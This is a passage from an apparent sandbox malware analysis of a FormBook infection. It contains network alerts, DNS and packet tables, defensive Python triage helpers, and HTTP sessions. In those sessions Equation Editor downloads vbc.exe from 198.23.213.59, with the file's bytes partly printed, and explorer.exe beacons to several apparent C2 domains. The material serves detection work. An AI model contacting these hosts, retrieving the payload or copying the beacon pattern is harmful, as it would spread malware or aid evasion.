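01/13/22-20:23:11.619415  [**] [1:2031412:1] ET TROJAN FormBook CnC Checkin (GET) [**] [Classification: A Network Trojan was detected] [Priority: 1] {TCP} 192.168.2.22:49172 -> 192.185.98.251:80
"""

# Snort fast-alert layout: timestamp, [**] [gid:sid:rev] message [**], optional
# classification/priority, {proto} src:port -> dst:port.
FAST_RE = re.compile(
    r"^(?P<ts>\S+)\s+\[\*\*\]\s+\[(?P<gid>\d+):(?P<sid>\d+):(?P<rev>\d+)\]\s+"
    r"(?P<msg>.*?)\s+\[\*\*\].*?\{(?P<proto>[A-Z]+)\}\s+"
    r"(?P<src>[\d.]+):(?P<sport>\d+)\s+->\s+(?P<dst>[\d.]+):(?P<dport>\d+)\s*$"
)

Conn = Tuple[str, int, str, int]


def parse_fast_alerts(text: str) -> List[dict]:
    """One dict per alert line; lines that are not fast-format alerts are skipped."""
    alerts = []
    for line in text.splitlines():
        m = FAST_RE.match(line)
        if not m:
            continue
        d = m.groupdict()
        for key in ("gid", "sid", "rev", "sport", "dport"):
            d[key] = int(d[key])
        alerts.append(d)
    return alerts


def collapse_by_connection(alerts: List[dict]) -> "OrderedDict[Conn, dict]":
    """Group alerts by (src, sport, dst, dport) so overlapping SIDs count as one event."""
    conns: "OrderedDict[Conn, dict]" = OrderedDict()
    for a in alerts:
        key: Conn = (a["src"], a["sport"], a["dst"], a["dport"])
        entry = conns.setdefault(key, {"first_seen": a["ts"], "sids": set(), "msgs": set()})
        entry["sids"].add(a["sid"])
        entry["msgs"].add(a["msg"])
    return conns


def c2_endpoints(alerts: List[dict]) -> List[Tuple[str, int]]:
    """Unique (dest IP, dest port) pairs in order of first appearance, ready for blocking."""
    seen: "OrderedDict[Tuple[str, int], None]" = OrderedDict()
    for a in alerts:
        seen.setdefault((a["dst"], a["dport"]), None)
    return list(seen)


if __name__ == "__main__":
    parsed = parse_fast_alerts(SAMPLE_ALERTS)
    for key, entry in collapse_by_connection(parsed).items():
        print(entry["first_seen"], key, sorted(entry["sids"]))
    print("C2 endpoints:", c2_endpoints(parsed))
```

Grouping by connection rather than by SID is what turns nine alerts into three incidents and stops a ticket queue from tripling. One caveat worth carrying into the packet list that follows: the earliest connection in the run, to 198.23.213.59:80 at 20:21:55, raises no Snort alert at all, so an IOC list built only from alerts misses it; correlate with the raw flow records before declaring the network side fully scoped.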

                                                  Network Port Distribution

                                                  TCP Packets

                                                  Timestamp                            Source Port  Dest Port  Source IP      Dest IP
                                                  Jan 13, 2022 20:21:55.579416990 CET  49167        80         192.168.2.22   198.23.213.59
                                                  Jan 13, 2022 20:21:55.694510937 CET  80           49167      198.23.213.59  192.168.2.22
                                                  Jan 13, 2022 20:21:55.694689035 CET  49167        80         192.168.2.22   198.23.213.59
                                                  Jan 13, 2022 20:21:55.695291996 CET  49167        80         192.168.2.22   198.23.213.59
                                                  Jan 13, 2022 20:21:55.811695099 CET  80           49167      198.23.213.59  192.168.2.22
                                                  Jan 13, 2022 20:21:55.811763048 CET  80           49167      198.23.213.59  192.168.2.22
                                                  Jan 13, 2022 20:21:55.811800003 CET  80           49167      198.23.213.59  192.168.2.22
                                                  Jan 13, 2022 20:21:55.811837912 CET  80           49167      198.23.213.59  192.168.2.22
                                                  Jan 13, 2022 20:21:55.811898947 CET  49167        80         192.168.2.22   198.23.213.59
                                                  Jan 13, 2022 20:21:55.811955929 CET  49167        80         192.168.2.22   198.23.213.59
                                                  Jan 13, 2022 20:21:55.926425934 CET  80           49167      198.23.213.59  192.168.2.22
                                                  Jan 13, 2022 20:21:55.926457882 CET  80           49167      198.23.213.59  192.168.2.22
                                                  Jan 13, 2022 20:21:55.926476002 CET  80           49167      198.23.213.59  192.168.2.22
                                                  Jan 13, 2022 20:21:55.926496029 CET  80           49167      198.23.213.59  192.168.2.22
                                                  Jan 13, 2022 20:21:55.926512957 CET  80           49167      198.23.213.59  192.168.2.22
                                                  Jan 13, 2022 20:21:55.926528931 CET  80           49167      198.23.213.59  192.168.2.22
                                                  Jan 13, 2022 20:21:55.926544905 CET  80           49167      198.23.213.59  192.168.2.22
                                                  Jan 13, 2022 20:21:55.926565886 CET  80           49167      198.23.213.59  192.168.2.22
                                                  Jan 13, 2022 20:21:55.926613092 CET  49167        80         192.168.2.22   198.23.213.59
                                                  Jan 13, 2022 20:21:55.926655054 CET  49167        80         192.168.2.22   198.23.213.59
                                                  Jan 13, 2022 20:21:56.040818930 CET  80           49167      198.23.213.59  192.168.2.22
                                                  Jan 13, 2022 20:21:56.040985107 CET  80           49167      198.23.213.59  192.168.2.22
                                                  Jan 13, 2022 20:21:56.041049004 CET  49167        80         192.168.2.22   198.23.213.59
                                                  Jan 13, 2022 20:21:56.041095018 CET  80           49167      198.23.213.59  192.168.2.22
                                                  Jan 13, 2022 20:21:56.041099072 CET  49167        80         192.168.2.22   198.23.213.59
                                                  Jan 13, 2022 20:21:56.041160107 CET  80           49167      198.23.213.59  192.168.2.22
                                                  Jan 13, 2022 20:21:56.041191101 CET  80           49167      198.23.213.59  192.168.2.22
                                                  Jan 13, 2022 20:21:56.041201115 CET  49167        80         192.168.2.22   198.23.213.59
                                                  Jan 13, 2022 20:21:56.041217089 CET  49167        80         192.168.2.22   198.23.213.59
                                                  Jan 13, 2022 20:21:56.041232109 CET  49167        80         192.168.2.22   198.23.213.59
                                                  Jan 13, 2022 20:21:56.041234970 CET  80           49167      198.23.213.59  192.168.2.22
                                                  Jan 13, 2022 20:21:56.041304111 CET  80           49167      198.23.213.59  192.168.2.22
                                                  Jan 13, 2022 20:21:56.041325092 CET  49167        80         192.168.2.22   198.23.213.59
                                                  Jan 13, 2022 20:21:56.041343927 CET  80           49167      198.23.213.59  192.168.2.22
                                                  Jan 13, 2022 20:21:56.041352034 CET  49167        80         192.168.2.22   198.23.213.59
                                                  Jan 13, 2022 20:21:56.041383982 CET  80           49167      198.23.213.59  192.168.2.22
                                                  Jan 13, 2022 20:21:56.041393042 CET  49167        80         192.168.2.22   198.23.213.59
                                                  Jan 13, 2022 20:21:56.041423082 CET  80           49167      198.23.213.59  192.168.2.22
                                                  Jan 13, 2022 20:21:56.041448116 CET  49167        80         192.168.2.22   198.23.213.59
                                                  Jan 13, 2022 20:21:56.041462898 CET  49167        80         192.168.2.22   198.23.213.59
                                                  Jan 13, 2022 20:21:56.041464090 CET  80           49167      198.23.213.59  192.168.2.22
                                                  Jan 13, 2022 20:21:56.041503906 CET  80           49167      198.23.213.59  192.168.2.22
                                                  Jan 13, 2022 20:21:56.041517973 CET  49167        80         192.168.2.22   198.23.213.59
                                                  Jan 13, 2022 20:21:56.041543007 CET  80           49167      198.23.213.59  192.168.2.22
                                                  Jan 13, 2022 20:21:56.041558981 CET  49167        80         192.168.2.22   198.23.213.59
                                                  Jan 13, 2022 20:21:56.041584015 CET  80           49167      198.23.213.59  192.168.2.22
                                                  Jan 13, 2022 20:21:56.041584969 CET  49167        80         192.168.2.22   198.23.213.59
                                                  Jan 13, 2022 20:21:56.041621923 CET  80           49167      198.23.213.59  192.168.2.22
                                                  Jan 13, 2022 20:21:56.041630983 CET  49167        80         192.168.2.22   198.23.213.59
                                                  Jan 13, 2022 20:21:56.041665077 CET  49167        80         192.168.2.22   198.23.213.59
                                                  Jan 13, 2022 20:21:56.044822931 CET  49167        80         192.168.2.22   198.23.213.59
                                                  Jan 13, 2022 20:21:56.156091928 CET  80           49167      198.23.213.59  192.168.2.22
                                                  Jan 13, 2022 20:21:56.156125069 CET  80           49167      198.23.213.59  192.168.2.22
                                                  Jan 13, 2022 20:21:56.156141996 CET  80           49167      198.23.213.59  192.168.2.22
                                                  Jan 13, 2022 20:21:56.156157017 CET  80           49167      198.23.213.59  192.168.2.22
                                                  Jan 13, 2022 20:21:56.156172991 CET  80           49167      198.23.213.59  192.168.2.22
                                                  Jan 13, 2022 20:21:56.156188965 CET  80           49167      198.23.213.59  192.168.2.22
                                                  Jan 13, 2022 20:21:56.156203985 CET  80           49167      198.23.213.59  192.168.2.22
                                                  Jan 13, 2022 20:21:56.156219959 CET  80           49167      198.23.213.59  192.168.2.22
                                                  Jan 13, 2022 20:21:56.156296015 CET  80           49167      198.23.213.59  192.168.2.22
                                                  Jan 13, 2022 20:21:56.156311989 CET  80           49167      198.23.213.59  192.168.2.22
                                                  Jan 13, 2022 20:21:56.156337023 CET  80           49167      198.23.213.59  192.168.2.22
                                                  Jan 13, 2022 20:21:56.156353951 CET  80           49167      198.23.213.59  192.168.2.22
                                                  Jan 13, 2022 20:21:56.156366110 CET4916780192.168.2.22198.23.213.59
                                                  Jan 13, 2022 20:21:56.156368971 CET8049167198.23.213.59192.168.2.22
                                                  Jan 13, 2022 20:21:56.156387091 CET8049167198.23.213.59192.168.2.22
                                                  Jan 13, 2022 20:21:56.156404018 CET4916780192.168.2.22198.23.213.59
                                                  Jan 13, 2022 20:21:56.156408072 CET8049167198.23.213.59192.168.2.22
                                                  Jan 13, 2022 20:21:56.156425953 CET8049167198.23.213.59192.168.2.22
                                                  Jan 13, 2022 20:21:56.156429052 CET4916780192.168.2.22198.23.213.59
                                                  Jan 13, 2022 20:21:56.156443119 CET8049167198.23.213.59192.168.2.22
                                                  Jan 13, 2022 20:21:56.156459093 CET8049167198.23.213.59192.168.2.22
                                                  Jan 13, 2022 20:21:56.156469107 CET4916780192.168.2.22198.23.213.59
                                                  Jan 13, 2022 20:21:56.156500101 CET4916780192.168.2.22198.23.213.59
                                                  Jan 13, 2022 20:21:56.156510115 CET8049167198.23.213.59192.168.2.22
                                                  Jan 13, 2022 20:21:56.156527042 CET8049167198.23.213.59192.168.2.22
                                                  Jan 13, 2022 20:21:56.156546116 CET8049167198.23.213.59192.168.2.22
                                                  Jan 13, 2022 20:21:56.156569958 CET4916780192.168.2.22198.23.213.59
                                                  Jan 13, 2022 20:21:56.156572104 CET8049167198.23.213.59192.168.2.22
                                                  Jan 13, 2022 20:21:56.156583071 CET8049167198.23.213.59192.168.2.22
                                                  Jan 13, 2022 20:21:56.156589031 CET8049167198.23.213.59192.168.2.22
                                                  Jan 13, 2022 20:21:56.156601906 CET8049167198.23.213.59192.168.2.22
                                                  Jan 13, 2022 20:21:56.156619072 CET8049167198.23.213.59192.168.2.22
                                                  Jan 13, 2022 20:21:56.156634092 CET8049167198.23.213.59192.168.2.22
                                                  Jan 13, 2022 20:21:56.156645060 CET4916780192.168.2.22198.23.213.59
                                                  Jan 13, 2022 20:21:56.156651974 CET8049167198.23.213.59192.168.2.22
                                                  Jan 13, 2022 20:21:56.156667948 CET8049167198.23.213.59192.168.2.22
                                                  Jan 13, 2022 20:21:56.156681061 CET4916780192.168.2.22198.23.213.59
                                                  Jan 13, 2022 20:21:56.156682968 CET8049167198.23.213.59192.168.2.22
                                                  Jan 13, 2022 20:21:56.156713963 CET4916780192.168.2.22198.23.213.59
                                                  Jan 13, 2022 20:21:56.156758070 CET4916780192.168.2.22198.23.213.59
                                                  Jan 13, 2022 20:21:56.160103083 CET4916780192.168.2.22198.23.213.59
                                                  Jan 13, 2022 20:21:56.270792007 CET8049167198.23.213.59192.168.2.22
                                                  Jan 13, 2022 20:21:56.270822048 CET8049167198.23.213.59192.168.2.22
                                                  Jan 13, 2022 20:21:56.270838976 CET8049167198.23.213.59192.168.2.22
                                                  Jan 13, 2022 20:21:56.270857096 CET8049167198.23.213.59192.168.2.22
                                                  Jan 13, 2022 20:21:56.270872116 CET8049167198.23.213.59192.168.2.22
                                                  Jan 13, 2022 20:21:56.270889044 CET8049167198.23.213.59192.168.2.22
                                                  Jan 13, 2022 20:21:56.270889997 CET4916780192.168.2.22198.23.213.59
                                                  Jan 13, 2022 20:21:56.270905018 CET8049167198.23.213.59192.168.2.22

                                                  UDP Packets

Timestamp                            Source Port  Dest Port  Source IP       Dest IP
Jan 13, 2022 20:22:49.336359024 CET  52167        53         192.168.2.22    8.8.8.8
Jan 13, 2022 20:22:49.503792048 CET  53           52167      8.8.8.8         192.168.2.22
Jan 13, 2022 20:22:54.885034084 CET  50591        53         192.168.2.22    8.8.8.8
Jan 13, 2022 20:22:54.913263083 CET  53           50591      8.8.8.8         192.168.2.22
Jan 13, 2022 20:23:00.037771940 CET  57805        53         192.168.2.22    8.8.8.8
Jan 13, 2022 20:23:00.218267918 CET  53           57805      8.8.8.8         192.168.2.22
Jan 13, 2022 20:23:05.811104059 CET  59030        53         192.168.2.22    8.8.8.8
Jan 13, 2022 20:23:05.959788084 CET  53           59030      8.8.8.8         192.168.2.22
Jan 13, 2022 20:23:11.327357054 CET  59185        53         192.168.2.22    8.8.8.8
Jan 13, 2022 20:23:11.476555109 CET  53           59185      8.8.8.8         192.168.2.22
Jan 13, 2022 20:23:16.774473906 CET  55616        53         192.168.2.22    8.8.8.8
Jan 13, 2022 20:23:17.087388039 CET  53           55616      8.8.8.8         192.168.2.22
Jan 13, 2022 20:23:22.669341087 CET  49972        53         192.168.2.22    8.8.8.8
Jan 13, 2022 20:23:22.836792946 CET  53           49972      8.8.8.8         192.168.2.22
Jan 13, 2022 20:23:28.536506891 CET  51771        53         192.168.2.22    8.8.8.8
Jan 13, 2022 20:23:28.839101076 CET  53           51771      8.8.8.8         192.168.2.22
Jan 13, 2022 20:23:38.849476099 CET  59867        53         192.168.2.22    8.8.8.8
Jan 13, 2022 20:23:39.019042969 CET  53           59867      8.8.8.8         192.168.2.22

                                                  DNS Queries

Timestamp                            Source IP       Dest IP   Trans ID  OP Code             Name                                Type            Class
Jan 13, 2022 20:22:49.336359024 CET  192.168.2.22    8.8.8.8   0xb710    Standard query (0)  www.orphe.biz                       A (IP address)  IN (0x0001)
Jan 13, 2022 20:22:54.885034084 CET  192.168.2.22    8.8.8.8   0x439c    Standard query (0)  www.circlessalaries.com             A (IP address)  IN (0x0001)
Jan 13, 2022 20:23:00.037771940 CET  192.168.2.22    8.8.8.8   0xc18c    Standard query (0)  www.ylhwcl.com                      A (IP address)  IN (0x0001)
Jan 13, 2022 20:23:05.811104059 CET  192.168.2.22    8.8.8.8   0xfc43    Standard query (0)  www.terapiaholisticaemformacao.com  A (IP address)  IN (0x0001)
Jan 13, 2022 20:23:11.327357054 CET  192.168.2.22    8.8.8.8   0x9c63    Standard query (0)  www.ecommerceoptimise.com           A (IP address)  IN (0x0001)
Jan 13, 2022 20:23:16.774473906 CET  192.168.2.22    8.8.8.8   0x30e0    Standard query (0)  www.integratedheartspsychology.com  A (IP address)  IN (0x0001)
Jan 13, 2022 20:23:22.669341087 CET  192.168.2.22    8.8.8.8   0x9037    Standard query (0)  www.bjbwx114.com                    A (IP address)  IN (0x0001)
Jan 13, 2022 20:23:28.536506891 CET  192.168.2.22    8.8.8.8   0xbd42    Standard query (0)  www.topeasyip.company               A (IP address)  IN (0x0001)
Jan 13, 2022 20:23:38.849476099 CET  192.168.2.22    8.8.8.8   0x95dc    Standard query (0)  www.norfg.com                       A (IP address)  IN (0x0001)

                                                  DNS Answers

Timestamp                            Source IP       Dest IP         Trans ID  Reply Code      Name                                CName                           Address          Type                    Class
Jan 13, 2022 20:22:49.503792048 CET  8.8.8.8         192.168.2.22    0xb710    No error (0)    www.orphe.biz                       -                               103.224.212.220  A (IP address)          IN (0x0001)
Jan 13, 2022 20:22:54.913263083 CET  8.8.8.8         192.168.2.22    0x439c    No error (0)    www.circlessalaries.com             -                               195.211.74.112   A (IP address)          IN (0x0001)
Jan 13, 2022 20:23:00.218267918 CET  8.8.8.8         192.168.2.22    0xc18c    No error (0)    www.ylhwcl.com                      -                               122.10.28.11     A (IP address)          IN (0x0001)
Jan 13, 2022 20:23:05.959788084 CET  8.8.8.8         192.168.2.22    0xfc43    No error (0)    www.terapiaholisticaemformacao.com  terapiaholisticaemformacao.com  -                CNAME (Canonical name)  IN (0x0001)
Jan 13, 2022 20:23:05.959788084 CET  8.8.8.8         192.168.2.22    0xfc43    No error (0)    terapiaholisticaemformacao.com      -                               216.172.160.188  A (IP address)          IN (0x0001)
Jan 13, 2022 20:23:11.476555109 CET  8.8.8.8         192.168.2.22    0x9c63    No error (0)    www.ecommerceoptimise.com           ecommerceoptimise.com           -                CNAME (Canonical name)  IN (0x0001)
Jan 13, 2022 20:23:11.476555109 CET  8.8.8.8         192.168.2.22    0x9c63    No error (0)    ecommerceoptimise.com               -                               192.185.98.251   A (IP address)          IN (0x0001)
Jan 13, 2022 20:23:17.087388039 CET  8.8.8.8         192.168.2.22    0x30e0    No error (0)    www.integratedheartspsychology.com  -                               221.121.143.148  A (IP address)          IN (0x0001)
Jan 13, 2022 20:23:22.836792946 CET  8.8.8.8         192.168.2.22    0x9037    No error (0)    www.bjbwx114.com                    -                               23.80.120.93     A (IP address)          IN (0x0001)
Jan 13, 2022 20:23:28.839101076 CET  8.8.8.8         192.168.2.22    0xbd42    Name error (3)  www.topeasyip.company               none                            none             A (IP address)          IN (0x0001)
Jan 13, 2022 20:23:39.019042969 CET  8.8.8.8         192.168.2.22    0x95dc    No error (0)    www.norfg.com                       -                               43.134.0.76      A (IP address)          IN (0x0001)

                                                  HTTP Request Dependency Graph

                                                  • 198.23.213.59
                                                  • www.orphe.biz
                                                  • www.circlessalaries.com
                                                  • www.ylhwcl.com
                                                  • www.terapiaholisticaemformacao.com
                                                  • www.ecommerceoptimise.com
                                                  • www.integratedheartspsychology.com
                                                  • www.bjbwx114.com
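
The DNS table above and the HTTP sessions that follow are the observable shape of this sample's two network stages: EQNEDT32.EXE fetching a PE (session 0, `Content-Type: application/x-msdownload`, body starting `MZ`), then explorer.exe, after injection, resolving a new domain roughly every five seconds and sending the same `GET /i5nb/?…==` request with a 7-byte NUL body and `Connection: close` to each one. The Python below is an added triage helper, not Joe Sandbox code and not a published FormBook signature: it transcribes sessions 0-4 as constructed sample data (headers and bodies trimmed) and flags both behaviours. The thresholds (exactly two query parameters, a base64-looking value of 40+ characters, a path re-used against three or more Host headers) are my heuristics, chosen to fit what the report shows.

```python
import re
from dataclasses import dataclass
from typing import Dict, List, Optional, Tuple
from urllib.parse import urlsplit


@dataclass
class Session:
    """One HTTP session as the report lists it: process, peer, raw request and response."""
    sid: int
    process: str
    dst_ip: str
    request: str      # request line + headers, CRLF separated
    req_body: bytes
    response: str     # status line + headers ("" if no reply)
    resp_body: bytes  # leading bytes of the reply body


# Constructed from sessions 0-4 of this report; query strings copied verbatim,
# headers and bodies trimmed to what the checks below look at.
EXPLORER = r"C:\Windows\explorer.exe"
EQNEDT = r"C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE"
BEACON = "GET /i5nb/?{q} HTTP/1.1\r\nHost: {h}\r\nConnection: close\r\n"
SESSIONS = [
    Session(0, EQNEDT, "198.23.213.59",
            "GET /1155/vbc.exe HTTP/1.1\r\nHost: 198.23.213.59\r\nConnection: Keep-Alive\r\n", b"",
            "HTTP/1.1 200 OK\r\nContent-Type: application/x-msdownload\r\nContent-Length: 417792\r\n",
            bytes.fromhex("4d5a90000300000004000000ffff0000")),
    Session(1, EXPLORER, "103.224.212.220",
            BEACON.format(h="www.orphe.biz", q="hPGx3Z=4ha06H5pmr&7nqdxT7p=oQMs787eFXVjqrc0kpDhsTH4zTzevw4glhch4r9T7Ws8YTYXIREY3A8O8bSOutLAC2pWew=="),
            b"\x00" * 7, "HTTP/1.1 302 Found\r\nContent-Length: 0\r\n", b""),
    Session(2, EXPLORER, "195.211.74.112",
            BEACON.format(h="www.circlessalaries.com", q="7nqdxT7p=deof+8h2cV1ZhVyhzrGI39GlLFFvVq6Cbv4jXvKqou5r7IRZVEd6lg8tdgMKHVBHJLPsEg==&hPGx3Z=4ha06H5pmr"),
            b"\x00" * 7, "HTTP/1.1 200 OK\r\nContent-Type: text/html; charset=UTF-8\r\n", b"1fa8\r\n<!DOCTYPE html>"),
    Session(3, EXPLORER, "122.10.28.11",
            BEACON.format(h="www.ylhwcl.com", q="hPGx3Z=4ha06H5pmr&7nqdxT7p=1q0oPF09A/aJAPsKPuHQBkHWjjwJ/Gn81frD7rqKWOkW4wBsfhpWEnMiYvQLBvsNHCkSDA=="),
            b"\x00" * 7, "HTTP/1.1 200 OK\r\nContent-Type: text/html\r\n", b"<html xmlns="),
    Session(4, EXPLORER, "216.172.160.188",
            BEACON.format(h="www.terapiaholisticaemformacao.com", q="7nqdxT7p=mP9GS3thMR3+ARMxpcHmObplP0vLxCSJ1Uc4SKl6p1x9FFB9D/wfcJtU5Ejvu094ffKQCA==&hPGx3Z=4ha06H5pmr"),
            b"\x00" * 7, "HTTP/1.1 404 Not Found\r\nContent-Type: text/html\r\n", b"<!DOCTYPE html>"),
]

OFFICE_HOSTS = ("eqnedt32.exe", "winword.exe", "excel.exe", "powerpnt.exe")
B64 = re.compile(r"[A-Za-z0-9+/]{40,}={0,2}")  # heuristic: long base64-looking blob


def parse_msg(raw: str) -> Tuple[str, Dict[str, str]]:
    """Split a raw request/response block into its first line and a lower-cased header map."""
    lines = [ln for ln in raw.split("\r\n") if ln]
    headers: Dict[str, str] = {}
    for ln in lines[1:]:
        name, _, value = ln.partition(":")
        headers[name.strip().lower()] = value.strip()
    return (lines[0] if lines else ""), headers


def office_fetched_executable(s: Session) -> bool:
    """Equation Editor or an Office host pulling a PE over HTTP is the dropper stage."""
    if not s.process.lower().endswith(OFFICE_HOSTS):
        return False
    _, hdrs = parse_msg(s.response)
    return hdrs.get("content-type", "") == "application/x-msdownload" or s.resp_body.startswith(b"MZ")


def beacon_path(s: Session) -> Optional[str]:
    """Return the URI path when the request has the shape of sessions 1-4 (GET, two query
    parameters of which one is a long base64-looking blob, Connection: close, and a body
    that is nothing but NUL padding); otherwise None."""
    line, hdrs = parse_msg(s.request)
    parts = line.split(" ")
    if len(parts) != 3 or parts[0] != "GET":
        return None
    url = urlsplit(parts[1])
    # Split by hand: parse_qsl would turn '+' into a space and break the base64 check.
    values = [kv.partition("=")[2] for kv in url.query.split("&") if kv]
    if len(values) != 2 or not any(B64.fullmatch(v) for v in values):
        return None
    if hdrs.get("connection", "").lower() != "close":
        return None
    if not s.req_body or s.req_body.strip(b"\x00"):
        return None
    return url.path


def beacon_clusters(sessions: List[Session], min_hosts: int = 3) -> Dict[Tuple[str, str], List[str]]:
    """Group beacon-shaped requests by (process, path). One path re-used against several
    unrelated Host headers is the tell: the hosts are decoys, the path and blob are the C2."""
    groups: Dict[Tuple[str, str], List[str]] = {}
    for s in sessions:
        path = beacon_path(s)
        if path is None:
            continue
        host = parse_msg(s.request)[1].get("host", s.dst_ip)
        groups.setdefault((s.process, path), []).append(host)
    return {k: v for k, v in groups.items() if len(set(v)) >= min_hosts}


def triage(sessions: List[Session]) -> List[str]:
    """Human-readable findings for the two behaviours above."""
    findings = []
    for s in sessions:
        if office_fetched_executable(s):
            findings.append(f"session {s.sid}: {s.process} downloaded a PE from {s.dst_ip}")
    for (proc, path), hosts in beacon_clusters(sessions).items():
        findings.append(f"{proc}: path {path} re-used against {len(set(hosts))} hosts ({', '.join(hosts)})")
    return findings


if __name__ == "__main__":
    for finding in triage(SESSIONS):
        print(finding)
```

Run against the transcribed sessions it yields two findings: the EQNEDT32.EXE download of vbc.exe and the `/i5nb/` path hit on four different hosts from explorer.exe. The second check is the one worth keeping on a proxy log: a single process issuing identical-shaped GETs to a list of unrelated domains, most of which answer with parked pages or 404s, stands out even when every individual host looks benign.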

                                                  HTTP Packets

Session ID  Source IP     Source Port  Destination IP   Destination Port  Process
0           192.168.2.22  49167        198.23.213.59    80                C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
Timestamp                            kBytes transferred  Direction  Data
Jan 13, 2022 20:21:55.695291996 CET  0                   OUT        GET /1155/vbc.exe HTTP/1.1
Accept: */*
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
Host: 198.23.213.59
Connection: Keep-Alive
Jan 13, 2022 20:21:55.811695099 CET  1                   IN         HTTP/1.1 200 OK
Date: Fri, 14 Jan 2022 02:21:54 GMT
Server: Apache/2.4.51 (Win64) OpenSSL/1.1.1l PHP/7.4.26
Last-Modified: Thu, 13 Jan 2022 22:04:27 GMT
ETag: "66000-5d57ddeb75e04"
Accept-Ranges: bytes
Content-Length: 417792
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: application/x-msdownload
                                                  Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 48 3f e0 61 00 00 00 00 00 00 00 00 e0 00 0e 01 0b 01 06 00 00 56 06 00 00 08 00 00 00 00 00 00 3a 75 06 00 00 20 00 00 00 80 06 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 c0 06 00 00 02 00 00 00 00 00 00 02 00 40 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 e0 74 06 00 57 00 00 00 00 80 06 00 98 05 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 a0 06 00 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 08 00 00 00 00 00 00 00 00 00 00 00 08 20 00 00 48 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 40 55 06 00 00 20 00 00 00 56 06 00 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 73 72 63 00 00 00 98 05 00 00 00 80 06 00 00 06 00 00 00 58 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 0c 00 00 00 00 a0 06 00 00 02 00 00 00 5e 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 1c 75 06 00 00 00 00 00 48 00 00 00 02 00 05 00 7c 46 06 00 64 2e 00 00 03 00 00 00 2d 00 00 06 f8 5d 00 00 84 e8 05 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 7a 02 28 17 00 00 0a 02 03 7d 01 00 00 04 02 28 18 00 00 0a 6f 19 00 00 0a 7d 03 00 00 04 2a 00 1b 30 02 00 1b 00 00 00 01 00 00 11 02 7b 01 00 00 04 0a 06 1f fd 
2e 04 06 17 33 0a 00 de 07 02 28 04 00 00 06 dc 2a 00 01 10 00 00 02 00 11 00 02 13 00 07 00 00 00 00 1b 30 04 00 fc 00 00 00 02 00 00 11 02 7b 01 00 00 04 0b 07 2c 0b 07 17 2e 66 16 0a dd e5 00 00 00 02 15 7d 01 00 00 04 02 16 7d 06 00 00 04 02 17 7d 07 00 00 04 02 1f fe 73 0a 00 00 06 6f 04 00 00 0a 7d 08 00 00 04 02 1f fd 7d 01 00 00 04 38 7f 00 00 00 02 02 7b 08 00 00 04 6f 03 00 00 0a 7d 09 00 00 04 02 02 7b 07 00 00 04 7d 02 00 00 04 02 17 7d 01 00 00 04 17 0a dd 86 00 00 00 02 1f fd 7d 01 00 00 04 02 7b 04 00 00 04 0d 02 09 17 59 7d 04 00 00 04 02 7b 04 00 00 04 2d 04 16 0a 2b 48 02 7b 07 00 00 04 0c 02 08 02 7b 06 00 00 04 58 02 7b 04 00 00 04 58 20 8d 3b e0 7c 02 7b 09 00 00 04 58 61 7d 07 00 00 04 02 08 7d 06 00 00 04 02 7b 08 00 00 04 6f 84 00 00 06 3a 71 ff ff ff 02 28 04 00 00 06 2b 08 02 28 04 00 00 06 de 12 02 14 7d 08 00 00 04 16 0a de 07 02 28 02 00 00 06 dc 06 2a 01 10 00 00 04 00 00 00 f3 f3 00 07 00 00 00 00 6e 02 15 7d 01 00 00 04 02 7b 08 00 00 04 2c 0b 02 7b 08 00 00 04 6f 63 00 00 06 2a 1e 02 7b 02 00 00 04 2a 1a 73 1a 00 00 0a 7a 00 32 02 7b 02
                                                  Data Ascii: MZ@!L!This program cannot be run in DOS mode.$PELH?aV:u @ @tW H.text@U V `.rsrcX@@.reloc^@BuH|Fd.-]z(}(o}*0{.3(*0{,.f}}}so}}8{o}{}}}{Y}{-+H{{X{X ;|{Xa}}{o:q(+(}(*n}{,{oc*{*sz2{


Session ID  Source IP     Source Port  Destination IP   Destination Port  Process
1           192.168.2.22  49168        103.224.212.220  80                C:\Windows\explorer.exe
Timestamp                            kBytes transferred  Direction  Data
Jan 13, 2022 20:22:49.687273026 CET  439                 OUT        GET /i5nb/?hPGx3Z=4ha06H5pmr&7nqdxT7p=oQMs787eFXVjqrc0kpDhsTH4zTzevw4glhch4r9T7Ws8YTYXIREY3A8O8bSOutLAC2pWew== HTTP/1.1
Host: www.orphe.biz
Connection: close
Data Raw: 00 00 00 00 00 00 00
Data Ascii:
Jan 13, 2022 20:22:49.874944925 CET  440                 IN         HTTP/1.1 302 Found
Date: Thu, 13 Jan 2022 19:22:49 GMT
